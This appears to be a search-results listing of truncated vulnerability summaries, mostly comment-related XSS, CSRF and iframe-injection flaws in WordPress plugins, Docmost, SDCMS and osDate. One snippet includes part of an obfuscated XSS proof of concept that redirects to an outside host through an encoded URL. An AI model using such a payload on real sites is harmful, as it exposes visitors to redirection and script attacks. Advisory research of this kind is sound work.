9 matches found
CVE-2026-40927
Docmost is open-source collaborative wiki and documentation software. Prior to 0.80.0, when leaving a comment on a page, it is possible to include a JavaScript URI as the link. When a user clicks on the link the JavaScript executes. This vulnerability is fixed in 0.80.0...
WordPress Plugin Honeypot for WP Comment Security Vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in the PHP language. The platform supports personal blog sites on PHP and MySQL servers. WordPress plugin is an application plugin. A security vulnerability exists in WordPress...
CVE-2021-4227 Ark Comment Editor <= 2.15.6 - Iframe Injection via Comment
The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section...
WordPress Plugin Cross-Site Request Forgery Vulnerability
WordPress is a blogging platform from the WordPress Foundation, developed using the PHP language. The platform supports the hosting of personal blog sites on PHP and MySQL servers. WordPress Plugin is a WordPress open source application plugin. A cross-site request forgery vulnerability exists in...
WordPress plugin jQuery Reply to Comment Cross-Site Scripting Vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers. WordPress plugin is an application plugin. A cross-site scripting vulnerability exists...
CVE-2014-10382
The CVE-2014-10382 vulnerability affects the WordPress feature-comments plugin prior to version 1.2.5. It is a cross‑site request forgery (CSRF) flaw that allows an attacker to perform actions like featuring or burying comments by authenticated/unauthenticated users depending on the context descr...
The mining and use of the SDCMS 1.1sp1 XSS vulnerability - vulnerability and early warning - the black bar safety net
The mining and use of the SDCMS 1.1sp1 XSS vulnerability. SDCMS name: era website Information Management System. SDCMS is a website Information Management System based on ASP+ACCESS/MSSQL. Permanently free, open source! SDCMS to information as the theme, through text and image title as a starting...
wordpress281 comments show XSS vulnerability - vulnerability warning - the black bar safety net
Ghost boy’s blog, XEYE’s blog to assist in testing. POC: 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...
CVE-2006-3767
The CVE-2006-3767 entry describes a Cross-site Scripting (XSS) vulnerability in Darren's osDate 1.1.7 and earlier (showprofile.php) that allows remote attackers to inject arbitrary script/HTML via the onerror attribute in an HTML IMG tag with a non-existent src, used when posting a comment (txtco...